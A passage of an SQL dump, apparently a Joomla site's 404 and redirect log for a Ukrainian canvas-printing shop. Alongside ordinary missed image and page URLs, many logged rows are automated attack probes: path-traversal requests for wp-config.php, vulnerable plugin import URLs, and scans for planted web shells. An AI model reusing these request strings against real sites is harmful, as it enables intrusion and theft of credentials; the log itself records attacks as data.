04:32:45','0000-00-00 00:00:00',301),(2214,'http://ekvatorprint.com.ua/index.php?option=com_easyblog',NULL,'','',9,0,'2016-10-28 04:32:45','0000-00-00 00:00:00',301),(2215,'http://ekvatorprint.com.ua/index.php/blog/item/add/?tmpl=component',NULL,'','',9,0,'2016-10-28 04:32:46','0000-00-00 00:00:00',301),(2216,'http://ekvatorprint.com.ua/index.php/component/k2/item/add/',NULL,'','',9,0,'2016-10-28 04:32:59','0000-00-00 00:00:00',301),(2217,'http://ekvatorprint.com.ua/index.php?option=com_k2&view=item&task=add',NULL,'','',9,0,'2016-10-28 04:33:10','0000-00-00 00:00:00',301),(2218,'http://ekvatorprint.com.ua/index.php/sign-in/profile?layout=edit',NULL,'','',9,0,'2016-10-28 04:34:09','0000-00-00 00:00:00',301),(2219,'http://ekvatorprint.com.ua/index.php?option=com_myblog',NULL,'','',9,0,'2016-10-28 04:34:27','0000-00-00 00:00:00',301),(2220,'http://ekvatorprint.com.ua/index.php?option=com_community',NULL,'','',14,0,'2016-10-28 04:34:39','0000-00-00 00:00:00',301),(2221,'http://ekvatorprint.com.ua/components/com_comprofiler/js/menubest.min.js',NULL,'','',18,0,'2016-10-28 04:34:40','0000-00-00 00:00:00',301),(2222,'http://ekvatorprint.com.ua/index.php?option=com_comprofiler',NULL,'','',12,0,'2016-10-28 04:34:40','0000-00-00 00:00:00',301),(2223,'http://ekvatorprint.com.ua/index.php?option=com_easysocial',NULL,'','',12,0,'2016-10-28 04:34:40','0000-00-00 00:00:00',301),(2224,'http://ekvatorprint.com.ua/index.php?option=com_agorapro',NULL,'','',12,0,'2016-10-28 04:34:40','0000-00-00 00:00:00',301),(2225,'http://ekvatorprint.com.ua/index.php?option=com_easybookreloaded',NULL,'','',8,0,'2016-10-28 04:34:45','0000-00-00 00:00:00',301),(2226,'http://ekvatorprint.com.ua/index.php/gaestebuch/',NULL,'','',6,0,'2016-10-28 04:34:45','0000-00-00 00:00:00',301),(2227,'http://ekvatorprint.com.ua/gaestebuch',NULL,'','',6,0,'2016-10-28 04:34:45','0000-00-00 00:00:00',301),(2228,'http://ekvatorprint.com.ua/index.php?option=com_easygb',NULL,'','',6,0,'2016-10-28 04:34:45','0000-00-00 00:00:00',301),(2229,'http://ekvatorprint.com.ua/index.php?option=com_akobook',NULL,'','',7,0,'2016-10-28 04:34:46','0000-00-00 00:00:00',301),(2230,'http://ekvatorprint.com.ua/index.php?option=com_jambook',NULL,'','',6,0,'2016-10-28 04:34:46','0000-00-00 00:00:00',301),(2231,'http://ekvatorprint.com.ua/component/jambook/',NULL,'','',6,0,'2016-10-28 04:34:46','0000-00-00 00:00:00',301),(2232,'http://ekvatorprint.com.ua/index.php/component/jambook/',NULL,'','',6,0,'2016-10-28 04:34:47','0000-00-00 00:00:00',301),(2233,'http://ekvatorprint.com.ua/guestbook/',NULL,'','',6,0,'2016-10-28 04:34:47','0000-00-00 00:00:00',301),(2234,'http://ekvatorprint.com.ua/index.php/guestbook/',NULL,'','',9,0,'2016-10-28 04:34:47','0000-00-00 00:00:00',301),(2235,'http://ekvatorprint.com.ua/index.php?option=com_phocaguestbook&id=1',NULL,'','',7,0,'2016-10-28 04:34:47','0000-00-00 00:00:00',301),(2236,'http://ekvatorprint.com.ua/index.php?option=com_phocaguestbook',NULL,'','',6,0,'2016-10-28 04:34:47','0000-00-00 00:00:00',301),(2237,'http://ekvatorprint.com.ua/adminisytator',NULL,'','',1,0,'2016-10-28 08:21:03','0000-00-00 00:00:00',301),(2238,'http://ekvatorprint.com.ua/ad',NULL,'','',2,0,'2016-10-28 08:36:09','0000-00-00 00:00:00',301),(2239,'http://ekvatorprint.com.ua/Печать фото на холсте Харьков. (картина по фотографии). Все делаем в готовом виде, холст натянут на подрамник.',NULL,'http://ekvatorprint.com.ua/printing-on-canvas','',2,0,'2016-10-29 09:44:14','0000-00-00 00:00:00',301),(2240,'http://ekvatorprint.com.ua/images/thumbnails/images/modulnie+kartini/мк-121-fill-250x169.png',NULL,'','',4,0,'2016-10-30 17:09:53','0000-00-00 00:00:00',301),(2241,'http://ekvatorprint.com.ua/images/thumbnails/images/modulnie+kartini/мк-112-fill-247x142.png',NULL,'','',4,0,'2016-10-30 17:09:54','0000-00-00 00:00:00',301),(2242,'http://ekvatorprint.com.ua/images/thumbnails/images/modulnie+kartini/мк-130-fill-250x105.png',NULL,'','',4,0,'2016-10-30 17:09:55','0000-00-00 00:00:00',301),(2243,'http://ekvatorprint.com.ua/images/thumbnails/images/modulnie+kartini/мк-116-fill-236x142.png',NULL,'','',4,0,'2016-10-30 17:09:55','0000-00-00 00:00:00',301),(2244,'http://ekvatorprint.com.ua/images/thumbnails/images/modulnie+kartini/мк-128-fill-250x105.png',NULL,'','',4,0,'2016-10-30 17:09:55','0000-00-00 00:00:00',301),(2245,'http://ekvatorprint.com.ua/images/thumbnails/images/modulnie+kartini/мк-126-fill-250x155.png',NULL,'','',4,0,'2016-10-30 17:09:55','0000-00-00 00:00:00',301),(2246,'http://ekvatorprint.com.ua/images/thumbnails/images/modulnie+kartini/мк-120-fill-258x174.png',NULL,'','',4,0,'2016-10-30 17:09:55','0000-00-00 00:00:00',301),(2247,'http://ekvatorprint.com.ua/images/thumbnails/images/modulnie+kartini/мк-127-fill-250x172.png',NULL,'','',4,0,'2016-10-30 17:09:55','0000-00-00 00:00:00',301),(2248,'http://ekvatorprint.com.ua/images/thumbnails/images/modulnie+kartini/мк-131-fill-250x155.png',NULL,'','',4,0,'2016-10-30 17:09:55','0000-00-00 00:00:00',301),(2249,'http://ekvatorprint.com.ua/images/thumbnails/images/modulnie+kartini/мк-124-fill-250x151.png',NULL,'','',4,0,'2016-10-30 17:09:55','0000-00-00 00:00:00',301),(2250,'http://ekvatorprint.com.ua/images/thumbnails/images/modulnie+kartini/мк-113-fill-236x154.png',NULL,'','',4,0,'2016-10-30 17:09:55','0000-00-00 00:00:00',301),(2251,'http://ekvatorprint.com.ua/images/thumbnails/images/modulnie+kartini/мк-125-fill-250x155.png',NULL,'','',4,0,'2016-10-30 17:09:55','0000-00-00 00:00:00',301),(2252,'http://ekvatorprint.com.ua/images/thumbnails/images/modulnie+kartini/мк-114-fill-254x152.png',NULL,'','',4,0,'2016-10-30 17:09:55','0000-00-00 00:00:00',301),(2253,'http://ekvatorprint.com.ua/images/thumbnails/images/modulnie+kartini/мк-118-fill-250x144.png',NULL,'','',4,0,'2016-10-30 17:09:55','0000-00-00 00:00:00',301),(2254,'http://ekvatorprint.com.ua/images/thumbnails/images/modulnie+kartini/мк-129-fill-250x105.png',NULL,'','',4,0,'2016-10-30 17:09:56','0000-00-00 00:00:00',301),(2255,'http://ekvatorprint.com.ua/images/thumbnails/images/modulnie+kartini/мк-119-fill-239x140.png',NULL,'','',4,0,'2016-10-30 17:09:56','0000-00-00 00:00:00',301),(2256,'http://ekvatorprint.com.ua/images/thumbnails/images/modulnie+kartini/мк-115-fill-250x149.png',NULL,'','',4,0,'2016-10-30 17:09:56','0000-00-00 00:00:00',301),(2257,'http://ekvatorprint.com.ua/images/thumbnails/images/modulnie+kartini/мк-111-fill-246x96.png',NULL,'','',4,0,'2016-10-30 17:09:56','0000-00-00 00:00:00',301),(2258,'http://ekvatorprint.com.ua/images/thumbnails/images/modulnie+kartini/мк-123-fill-254x139.png',NULL,'','',4,0,'2016-10-30 17:09:56','0000-00-00 00:00:00',301),(2259,'http://ekvatorprint.com.ua/images/thumbnails/images/modulnie+kartini/мк-117-fill-258x151.png',NULL,'','',4,0,'2016-10-30 17:09:56','0000-00-00 00:00:00',301),(2260,'http://ekvatorprint.com.ua/images/thumbnails/images/modulnie+kartini/мк-122-fill-250x137.png',NULL,'','',4,0,'2016-10-30 17:09:56','0000-00-00 00:00:00',301),(2261,'http://ekvatorprint.com.ua/images/modulnie+kartini/мк-129.png',NULL,'','',6,0,'2016-10-30 17:09:56','0000-00-00 00:00:00',301),(2262,'http://ekvatorprint.com.ua/m/contacts',NULL,'','',1,0,'2016-11-01 12:33:44','0000-00-00 00:00:00',301),(2263,'http://ekvatorprint.com.ua/plugins/content/upgrade/ncpf.php',NULL,'','',5,0,'2016-11-02 14:38:23','0000-00-00 00:00:00',301),(2264,'http://ekvatorprint.com.ua/plugins/content/i.php',NULL,'','',3,0,'2016-11-02 14:40:28','0000-00-00 00:00:00',301),(2265,'http://ekvatorprint.com.ua/http:/ekvatorprint.com.ua/images/modulnie kartini/мк-129.png',NULL,'','',8,0,'2016-11-03 15:15:49','0000-00-00 00:00:00',301),(2266,'http://ekvatorprint.com.ua/plugins/system/banip.php',NULL,'','',1,0,'2016-11-04 03:15:17','0000-00-00 00:00:00',301),(2267,'http://ekvatorprint.com.ua/index.php?option=com_fabrik&c=import&view=import&fietype=csv&tableid=1',NULL,'','',1,0,'2016-11-04 03:15:19','0000-00-00 00:00:00',301),(2268,'http://ekvatorprint.com.ua/wp-content/plugins/downloads-manager/readme.txt',NULL,'','',1,0,'2016-11-07 04:40:02','0000-00-00 00:00:00',301),(2269,'http://ekvatorprint.com.ua/~daycare/assets/elfinder/elfinder.html',NULL,'','',2,0,'2016-11-08 07:04:50','0000-00-00 00:00:00',301),(2270,'http://ekvatorprint.com.ua/_core/utils/elfinder/elfinder.html',NULL,'','',2,0,'2016-11-08 07:04:50','0000-00-00 00:00:00',301),(2271,'http://ekvatorprint.com.ua/packages/ahmadazimi/laravel-media-manager/elfinder.html',NULL,'','',2,0,'2016-11-08 07:04:50','0000-00-00 00:00:00',301),(2272,'http://ekvatorprint.com.ua/modules/tadtools/ckeditor/elFinder/elfinder.html',NULL,'','',2,0,'2016-11-08 07:04:50','0000-00-00 00:00:00',301),(2273,'http://ekvatorprint.com.ua/common/js/elfinder_2.0/elfinder.html',NULL,'','',2,0,'2016-11-08 07:04:51','0000-00-00 00:00:00',301),(2274,'http://ekvatorprint.com.ua/1/wp-admin/setup-config.php',NULL,'','',1,0,'2016-11-10 01:12:20','0000-00-00 00:00:00',301),(2275,'http://ekvatorprint.com.ua/images_for_articles/modulnie_kartini_fon1',NULL,'','',6,0,'2016-11-10 11:30:39','0000-00-00 00:00:00',301),(2276,'http://ekvatorprint.com.ua/images_for_articles',NULL,'','',1,0,'2016-11-10 11:31:40','0000-00-00 00:00:00',301),(2277,'http://ekvatorprint.com.ua/images_for_articles/',NULL,'','',1,0,'2016-11-10 11:31:46','0000-00-00 00:00:00',301),(2278,'http://ekvatorprint.com.ua/images/images_for_articles/modulnie_kartini_fon1',NULL,'','',1,0,'2016-11-10 11:32:19','0000-00-00 00:00:00',301),(2279,'http://ekvatorprint.com.ua/images/pimeri_shablonov/мш-3-1',NULL,'','',1,0,'2016-11-10 11:32:58','0000-00-00 00:00:00',301),(2280,'http://ekvatorprint.com.ua/wp-register.php',NULL,'','',9,0,'2016-11-10 11:33:38','0000-00-00 00:00:00',301),(2281,'http://ekvatorprint.com.ua/wp-jqmain.php',NULL,'','',3,0,'2016-11-10 11:33:41','0000-00-00 00:00:00',301),(2282,'http://ekvatorprint.com.ua/wp-headers-class.php',NULL,'','',1,0,'2016-11-10 11:33:43','0000-00-00 00:00:00',301),(2283,'http://ekvatorprint.com.ua/joomla_hashes.php',NULL,'','',1,0,'2016-11-10 11:33:43','0000-00-00 00:00:00',301),(2284,'http://ekvatorprint.com.ua/wp-forms-ajax.php',NULL,'','',3,0,'2016-11-10 11:33:51','0000-00-00 00:00:00',301),(2285,'http://ekvatorprint.com.ua/backups.php?mode=config&key=C6y1F2EA7217PBTL1FlcH98sOpfo/r1Z76/OKFae',NULL,'','',5,0,'2016-11-10 11:34:06','0000-00-00 00:00:00',301),(2286,'http://ekvatorprint.com.ua/conyes.php',NULL,'','',1,0,'2016-11-10 11:34:14','0000-00-00 00:00:00',301),(2287,'http://ekvatorprint.com.ua/c0nfig.php',NULL,'','',7,0,'2016-11-10 11:34:14','0000-00-00 00:00:00',301),(2288,'http://ekvatorprint.com.ua/47646.php',NULL,'','',1,0,'2016-11-10 11:34:14','0000-00-00 00:00:00',301),(2289,'http://ekvatorprint.com.ua/,.php',NULL,'','',1,0,'2016-11-10 11:34:23','0000-00-00 00:00:00',301),(2290,'http://ekvatorprint.com.ua/images_for_articles/modulnie_kartini_fon1.jpg',NULL,'','',3,0,'2016-11-10 11:35:51','0000-00-00 00:00:00',301),(2291,'http://ekvatorprint.com.ua/wp-content/plugins/hb-audio-gallery-lite/gallery/audio-download.php?file_path=../../../../wp-config.php&file_size=10',NULL,'','',3,0,'2016-11-11 06:01:07','0000-00-00 00:00:00',301),(2292,'http://ekvatorprint.com.ua/wp-admin/admin.php?page=miwoftp&option=com_miwoftp&action=download&item=wp-config.php&order=name&srt=yes',NULL,'','',3,0,'2016-11-11 06:01:09','0000-00-00 00:00:00',301),(2293,'http://ekvatorprint.com.ua/images/images_for_articles/mks3.png',NULL,'','',7,0,'2016-11-11 12:29:45','0000-00-00 00:00:00',301),(2294,'http://ekvatorprint.com.ua/images/images_for_articles/mk1.png',NULL,'','',1,0,'2016-11-11 12:30:40','0000-00-00 00:00:00',301),(2295,'http://ekvatorprint.com.ua/banner-printing&',NULL,'','',1,0,'2016-11-13 12:02:41','0000-00-00 00:00:00',301),(2296,'http://ekvatorprint.com.ua/test',NULL,'','',3,0,'2016-11-14 10:41:05','0000-00-00 00:00:00',301),(2297,'http://ekvatorprint.com.ua/dvukhkomponentnye-shablony-modulnykh-kartin',NULL,'','',1,0,'2016-11-14 10:42:56','0000-00-00 00:00:00',301),(2298,'http://ekvatorprint.com.ua/test-2',NULL,'','',2,0,'2016-11-14 10:43:59','0000-00-00 00:00:00',301),(2299,'http://ekvatorprint.com.ua/eksperiment',NULL,'','',1,0,'2016-11-14 13:42:31','0000-00-00 00:00:00',301),(2300,'http://ekvatorprint.com.ua/images/images_for_articles/mks2.png',NULL,'','',3,0,'2016-11-14 15:14:33','0000-00-00 00:00:00',301),(2301,'http://ekvatorprint.com.ua/trekhkomponentnye-shablony-modulnykh-kartin',NULL,'','',106,0,'2016-11-14 17:31:36','0000-00-00 00:00:00',301),(2302,'http://ekvatorprint.com.ua/chetyrekhkomponentnye-shablony-modulnykh-kartin',NULL,'','',85,0,'2016-11-15 09:11:02','0000-00-00 00:00:00',301),(2303,'http://ekvatorprint.com.ua/pyatikomponentnye-shablony-modulnykh-kartin',NULL,'http://go.mail.ru/redir?q=%D1%88%D0%B0%D0%B1%D0%BB%D0%BE%D0%BD%D1%8B%20%D0%BC%D0%BE%D0%B4%D1%83%D0%BB%D1%8C%D0%BD%D1%8B%D1%85%20%D0%BA%D0%B0%D1%80%D1%82%D0%B8%D0%BD%20%D1%81%D0%BA%D0%B0%D1%87%D0%B0%D1%82%D1%8C&via_page=1&type=sr&redir=eJzLKCkpsNLXT80uSyzJLyooyswr0UvOz9UrTdQvqEwsyczOzy3Iz0vNK8mrTNUtzkhMysnPq9TNzU8pzcmrzM7QzU4sKsnMY7jYcWHDhY0Xdl_Yd2HvxW6FC3uAjC0Xmy_svtgDErjYqnBh14UNFxsuNl3YcWGvwsVGMLcdiJsu9jAYmphbGpuamliYMxwteyhvuGr3H-N3KhwsztJFAN1sTzo','',283,0,'2016-11-16 04:09:53','0000-00-00 00:00:00',301),(2304,'http://ekvatorprint.com.ua/sitemap.xml.gz',NULL,'http://ekvatorprint.com.ua/sitemap_index.xml','',67,0,'2016-11-16 10:43:41','0000-00-00 00:00:00',301),(2305,'http://ekvatorprint.com.ua/sitemap_index.xml.gz',NULL,'http://ekvatorprint.com.ua/sitemap.xml.gz','',66,0,'2016-11-16 10:43:41','0000-00-00 00:00:00',301),(2306,'http://ekvatorprint.com.ua/printing-on-vinyl',NULL,'http://ekvatorprint.com.ua/printing-on-vinyl','',4,0,'2016-11-16 11:10:22','0000-00-00 00:00:00',301),(2307,'http://ekvatorprint.com.ua/?option=com_content&view=article&id=7&Itemid=8',NULL,'','',2,0,'2016-11-16 11:10:24','0000-00-00 00:00:00',301),(2308,'http://ekvatorprint.com.ua/printing-on-canvas.html',NULL,'http://ekvatorprint.com.ua/','',4,0,'2016-11-16 12:50:03','0000-00-00 00:00:00',301),(2309,'http://ekvatorprint.com.ua/proxy.php',NULL,'ekvatorprint.com.ua','',3,0,'2016-11-16 20:47:42','0000-00-00 00:00:00',301),(2310,'http://ekvatorprint.com.ua/system.php',NULL,'ekvatorprint.com.ua','',5,0,'2016-11-16 20:48:02','0000-00-00 00:00:00',301),(2311,'http://ekvatorprint.com.ua/view.php',NULL,'ekvatorprint.com.ua','',6,0,'2016-11-16 20:48:54','0000-00-00 00:00:00',301),(2312,'http://ekvatorprint.com.ua/cache.php',NULL,'ekvatorprint.com.ua','',21,0,'2016-11-16 20:49:17','0000-00-00 00:00:00',301),(2313,'http://ekvatorprint.com.ua/info.php',NULL,'ekvatorprint.com.ua','',16,0,'2016-11-16 20:50:15','0000-00-00 00:00:00',301),(2314,'http://ekvatorprint.com.ua/gallery.php',NULL,'ekvatorprint.com.ua','',4,0,'2016-11-16 20:50:52','0000-00-00 00:00:00',301),(2315,'http://ekvatorprint.com.ua/help.php',NULL,'ekvatorprint.com.ua','',2,0,'2016-11-16 20:52:12','0000-00-00 00:00:00',301),(2316,'http://ekvatorprint.com.ua/options.php',NULL,'ekvatorprint.com.ua','',8,0,'2016-11-16 20:55:49','0000-00-00 00:00:00',301),(2317,'http://ekvatorprint.com.ua/model.php',NULL,'ekvatorprint.com.ua','',2,0,'2016-11-16 20:55:54','0000-00-00 00:00:00',301),(2318,'http://ekvatorprint.com.ua/option.php',NULL,'ekvatorprint.com.ua','',2,0,'2016-11-16 20:58:09','0000-00-00 00:00:00',301),(2319,'http://ekvatorprint.com.ua/user.php',NULL,'ekvatorprint.com.ua','',21,0,'2016-11-16 20:59:47','0000-00-00 00:00:00',301),(2320,'http://ekvatorprint.com.ua/page.php',NULL,'ekvatorprint.com.ua','',6,0,'2016-11-16 21:03:56','0000-00-00 00:00:00',301),(2321,'http://ekvatorprint.com.ua/files.php',NULL,'ekvatorprint.com.ua','',3,0,'2016-11-16 21:04:26','0000-00-00 00:00:00',301),(2322,'http://ekvatorprint.com.ua/article.php',NULL,'ekvatorprint.com.ua','',3,0,'2016-11-16 21:05:02','0000-00-00 00:00:00',301),(2323,'http://ekvatorprint.com.ua/defines.php',NULL,'ekvatorprint.com.ua','',2,0,'2016-11-16 21:05:52','0000-00-00 00:00:00',301),(2324,'http://ekvatorprint.com.ua/blog.php',NULL,'ekvatorprint.com.ua','',2,0,'2016-11-16 21:06:24','0000-00-00 00:00:00',301),(2325,'http://ekvatorprint.com.ua/xml.php',NULL,'ekvatorprint.com.ua','',7,0,'2016-11-16 21:06:32','0000-00-00 00:00:00',301),(2326,'http://ekvatorprint.com.ua/lib.php',NULL,'ekvatorprint.com.ua','',5,0,'2016-11-16 21:06:54','0000-00-00 00:00:00',301),(2327,'http://ekvatorprint.com.ua/login.php',NULL,'ekvatorprint.com.ua','',5,0,'2016-11-16 21:07:16','0000-00-00 00:00:00',301),(2328,'http://ekvatorprint.com.ua/functions.php',NULL,'ekvatorprint.com.ua','',7,0,'2016-11-16 21:10:06','0000-00-00 00:00:00',301),(2329,'http://ekvatorprint.com.ua/error.php',NULL,'ekvatorprint.com.ua','',14,0,'2016-11-16 21:10:09','0000-00-00 00:00:00',301),(2330,'http://ekvatorprint.com.ua/template.php',NULL,'ekvatorprint.com.ua','',2,0,'2016-11-16 21:12:33','0000-00-00 00:00:00',301),(2331,'http://ekvatorprint.com.ua/inc.php',NULL,'ekvatorprint.com.ua','',11,0,'2016-11-16 21:12:37','0000-00-00 00:00:00',301),(2332,'http://ekvatorprint.com.ua/session.php',NULL,'ekvatorprint.com.ua','',2,0,'2016-11-16 21:13:33','0000-00-00 00:00:00',301),(2333,'http://ekvatorprint.com.ua/search.php',NULL,'ekvatorprint.com.ua','',15,0,'2016-11-16 21:14:22','0000-00-00 00:00:00',301),(2334,'http://ekvatorprint.com.ua/ajax.php',NULL,'ekvatorprint.com.ua','',2,0,'2016-11-16 21:16:07','0000-00-00 00:00:00',301),(2335,'http://ekvatorprint.com.ua/title.php',NULL,'ekvatorprint.com.ua','',2,0,'2016-11-16 21:17:20','0000-00-00 00:00:00',301),(2336,'http://ekvatorprint.com.ua/menu.php',NULL,'ekvatorprint.com.ua','',3,0,'2016-11-16 21:17:51','0000-00-00 00:00:00',301),(2337,'http://ekvatorprint.com.ua/ini.php',NULL,'ekvatorprint.com.ua','',3,0,'2016-11-16 21:18:39','0000-00-00 00:00:00',301),(2338,'http://ekvatorprint.com.ua/code.php',NULL,'ekvatorprint.com.ua','',5,0,'2016-11-16 21:20:02','0000-00-00 00:00:00',301),(2339,'http://ekvatorprint.com.ua/global.php',NULL,'ekvatorprint.com.ua','',4,0,'2016-11-16 21:20:33','0000-00-00 00:00:00',301),(2340,'http://ekvatorprint.com.ua/file.php',NULL,'ekvatorprint.com.ua','',3,0,'2016-11-16 21:20:40','0000-00-00 00:00:00',301),(2341,'http://ekvatorprint.com.ua/themes.php',NULL,'ekvatorprint.com.ua','',2,0,'2016-11-16 21:20:46','0000-00-00 00:00:00',301),(2342,'http://ekvatorprint.com.ua/javascript.php',NULL,'ekvatorprint.com.ua','',2,0,'2016-11-16 21:21:16','0000-00-00 00:00:00',301),(2343,'http://ekvatorprint.com.ua/dirs.php',NULL,'ekvatorprint.com.ua','',2,0,'2016-11-16 21:23:13','0000-00-00 00:00:00',301),(2344,'http://ekvatorprint.com.ua/utf.php',NULL,'ekvatorprint.com.ua','',2,0,'2016-11-16 21:26:56','0000-00-00 00:00:00',301),(2345,'http://ekvatorprint.com.ua/diff.php',NULL,'ekvatorprint.com.ua','',2,0,'2016-11-16 21:27:07','0000-00-00 00:00:00',301),(2346,'http://ekvatorprint.com.ua/include.php',NULL,'ekvatorprint.com.ua','',3,0,'2016-11-16 21:28:59','0000-00-00 00:00:00',301),(2347,'http://ekvatorprint.com.ua/header.php',NULL,'ekvatorprint.com.ua','',2,0,'2016-11-16 21:29:25','0000-00-00 00:00:00',301),(2348,'http://ekvatorprint.com.ua/db.php',NULL,'ekvatorprint.com.ua','',6,0,'2016-11-16 21:29:43','0000-00-00 00:00:00',301),(2349,'http://ekvatorprint.com.ua/alias.php',NULL,'ekvatorprint.com.ua','',2,0,'2016-11-16 21:30:03','0000-00-00 00:00:00',301),(2350,'http://ekvatorprint.com.ua/css.php',NULL,'ekvatorprint.com.ua','',9,0,'2016-11-16 21:31:50','0000-00-00 00:00:00',301),(2351,'http://ekvatorprint.com.ua/dump.php',NULL,'ekvatorprint.com.ua','',3,0,'2016-11-16 21:32:40','0000-00-00 00:00:00',301),(2352,'http://ekvatorprint.com.ua/dir.php',NULL,'ekvatorprint.com.ua','',6,0,'2016-11-16 21:33:21','0000-00-00 00:00:00',301),(2353,'http://ekvatorprint.com.ua/object.php',NULL,'ekvatorprint.com.ua','',2,0,'2016-11-16 21:33:33','0000-00-00 00:00:00',301),(2354,'http://ekvatorprint.com.ua/list.php',NULL,'ekvatorprint.com.ua','',2,0,'2016-11-16 21:34:10','0000-00-00 00:00:00',301),(2355,'http://ekvatorprint.com.ua/press.php',NULL,'ekvatorprint.com.ua','',2,0,'2016-11-16 21:37:02','0000-00-00 00:00:00',301),(2356,'http://ekvatorprint.com.ua/index.php?option=com_content&view=article&itemid=18',NULL,'','',1,0,'2016-11-17 12:03:29','0000-00-00 00:00:00',301),(2357,'http://ekvatorprint.com.ua/images/pimeri_shablonov/',NULL,'','',1,0,'2016-11-17 21:38:30','0000-00-00 00:00:00',301),(2358,'http://ekvatorprint.com.ua/add.php',NULL,'','',5,0,'2016-11-19 01:52:21','0000-00-00 00:00:00',301),(2359,'http://ekvatorprint.com.ua/links/add.php',NULL,'','',4,0,'2016-11-19 01:52:22','0000-00-00 00:00:00',301),(2360,'http://ekvatorprint.com.ua/cmd.php',NULL,'http://ekvatorprint.com.ua/cmd.php','',1,0,'2016-11-19 09:34:43','0000-00-00 00:00:00',301),(2361,'http://ekvatorprint.com.ua/history.php',NULL,'http://ekvatorprint.com.ua/history.php','',1,0,'2016-11-19 09:34:43','0000-00-00 00:00:00',301),(2362,'http://ekvatorprint.com.ua/index3.php',NULL,'http://ekvatorprint.com.ua/index3.php','',2,0,'2016-11-19 09:34:43','0000-00-00 00:00:00',301),(2363,'http://ekvatorprint.com.ua/cache/logo_img.php',NULL,'http://ekvatorprint.com.ua/cache/logo_img.php','',10,0,'2016-11-19 09:34:43','0000-00-00 00:00:00',301),(2364,'http://ekvatorprint.com.ua/wp-content/languages/system.php',NULL,'http://ekvatorprint.com.ua/wp-content/languages/system.php','',1,0,'2016-11-19 09:34:43','0000-00-00 00:00:00',301),(2365,'http://ekvatorprint.com.ua/tmp/install_57f7724dcf0a3/mod_ariimageesws.php',NULL,'http://ekvatorprint.com.ua/tmp/install_57f7724dcf0a3/mod_ariimageesws.php','',1,0,'2016-11-19 09:34:43','0000-00-00 00:00:00',301),(2366,'http://ekvatorprint.com.ua/administrator/components/com_weblinks/language/conf_41.php',NULL,'http://ekvatorprint.com.ua/administrator/components/com_weblinks/language/conf_41.php','',1,0,'2016-11-19 09:34:43','0000-00-00 00:00:00',301),(2367,'http://ekvatorprint.com.ua/administrator/components/com_users/views/level/tmpl/old_46.php',NULL,'http://ekvatorprint.com.ua/administrator/components/com_users/views/level/tmpl/old_46.php','',1,0,'2016-11-19 09:34:43','0000-00-00 00:00:00',301),(2368,'http://ekvatorprint.com.ua/components/com_jce/com_jce.php',NULL,'http://ekvatorprint.com.ua/components/com_jce/com_jce.php','',1,0,'2016-11-19 09:34:43','0000-00-00 00:00:00',301),(2369,'http://ekvatorprint.com.ua/tmp/install_57f5fe454ae1b/mod_ariimageesws.php',NULL,'http://ekvatorprint.com.ua/tmp/install_57f5fe454ae1b/mod_ariimageesws.php','',1,0,'2016-11-19 09:34:44','0000-00-00 00:00:00',301),(2370,'http://ekvatorprint.com.ua/administrator/index1.php',NULL,'http://ekvatorprint.com.ua/administrator/index1.php','',2,0,'2016-11-19 09:38:02','0000-00-00 00:00:00',301),(2371,'http://ekvatorprint.com.ua/administrator/cache/advanced_settings.php',NULL,'http://ekvatorprint.com.ua/administrator/cache/advanced_settings.php','',3,0,'2016-11-19 09:38:02','0000-00-00 00:00:00',301),(2372,'http://ekvatorprint.com.ua/administrator/librareis.php',NULL,'http://ekvatorprint.com.ua/administrator/librareis.php','',2,0,'2016-11-19 09:38:02','0000-00-00 00:00:00',301),(2373,'http://ekvatorprint.com.ua/administrator/logo_img.php',NULL,'http://ekvatorprint.com.ua/administrator/logo_img.php','',16,0,'2016-11-19 09:38:02','0000-00-00 00:00:00',301),(2374,'http://ekvatorprint.com.ua/administrator/components/com_breezingforms/libraries/jquery/jtree/themes/filetype.php',NULL,'http://ekvatorprint.com.ua/administrator/components/com_breezingforms/libraries/jquery/jtree/themes/filetype.php','',2,0,'2016-11-19 09:38:02','0000-00-00 00:00:00',301),(2375,'http://ekvatorprint.com.ua/administrator/components/com_contenthistory/views/history/tmpl/similar_text.php',NULL,'http://ekvatorprint.com.ua/administrator/components/com_contenthistory/views/history/tmpl/similar_text.php','',2,0,'2016-11-19 09:38:02','0000-00-00 00:00:00',301),(2376,'http://ekvatorprint.com.ua/cgi.php',NULL,'http://ekvatorprint.com.ua/cgi.php','',3,0,'2016-11-19 09:38:03','0000-00-00 00:00:00',301),(2377,'http://ekvatorprint.com.ua/administrator/templates/hathor/html/com_admin/bcmul.php',NULL,'http://ekvatorprint.com.ua/administrator/templates/hathor/html/com_admin/bcmul.php','',1,0,'2016-11-19 09:38:03','0000-00-00 00:00:00',301),(2378,'http://ekvatorprint.com.ua/images/logo_img.php',NULL,'http://ekvatorprint.com.ua/images/logo_img.php','',28,0,'2016-11-19 09:39:41','0000-00-00 00:00:00',301),(2379,'http://ekvatorprint.com.ua/components/com_search/com_search.php',NULL,'http://ekvatorprint.com.ua/components/com_search/com_search.php','',2,0,'2016-11-19 09:39:41','0000-00-00 00:00:00',301),(2380,'http://ekvatorprint.com.ua/confg.php',NULL,'http://ekvatorprint.com.ua/confg.php','',1,0,'2016-11-19 09:39:41','0000-00-00 00:00:00',301),(2381,'http://ekvatorprint.com.ua/images/apache-conf.php',NULL,'http://ekvatorprint.com.ua/images/apache-conf.php','',2,0,'2016-11-19 09:39:41','0000-00-00 00:00:00',301),(2382,'http://ekvatorprint.com.ua/components/com_media/com_media.php',NULL,'http://ekvatorprint.com.ua/components/com_media/com_media.php','',2,0,'2016-11-19 09:39:41','0000-00-00 00:00:00',301),(2383,'http://ekvatorprint.com.ua/images/cms_update.php',NULL,'http://ekvatorprint.com.ua/images/cms_update.php','',2,0,'2016-11-19 09:39:41','0000-00-00 00:00:00',301),(2384,'http://ekvatorprint.com.ua/components/com_weblinks/configs.php',NULL,'http://ekvatorprint.com.ua/components/com_weblinks/configs.php','',2,0,'2016-11-19 09:39:42','0000-00-00 00:00:00',301),(2385,'http://ekvatorprint.com.ua/components/com_weblinks/com_weblinks.php',NULL,'http://ekvatorprint.com.ua/components/com_weblinks/com_weblinks.php','',2,0,'2016-11-19 09:39:42','0000-00-00 00:00:00',301),(2386,'http://ekvatorprint.com.ua/components/com_wrapper/com_wrapper.php',NULL,'http://ekvatorprint.com.ua/components/com_wrapper/com_wrapper.php','',2,0,'2016-11-19 09:39:42','0000-00-00 00:00:00',301),(2387,'http://ekvatorprint.com.ua/images/system_ml.php',NULL,'http://ekvatorprint.com.ua/images/system_ml.php','',3,0,'2016-11-19 09:54:42','0000-00-00 00:00:00',301),(2388,'http://ekvatorprint.com.ua/librareis.php',NULL,'http://ekvatorprint.com.ua/librareis.php','',2,0,'2016-11-19 09:54:43','0000-00-00 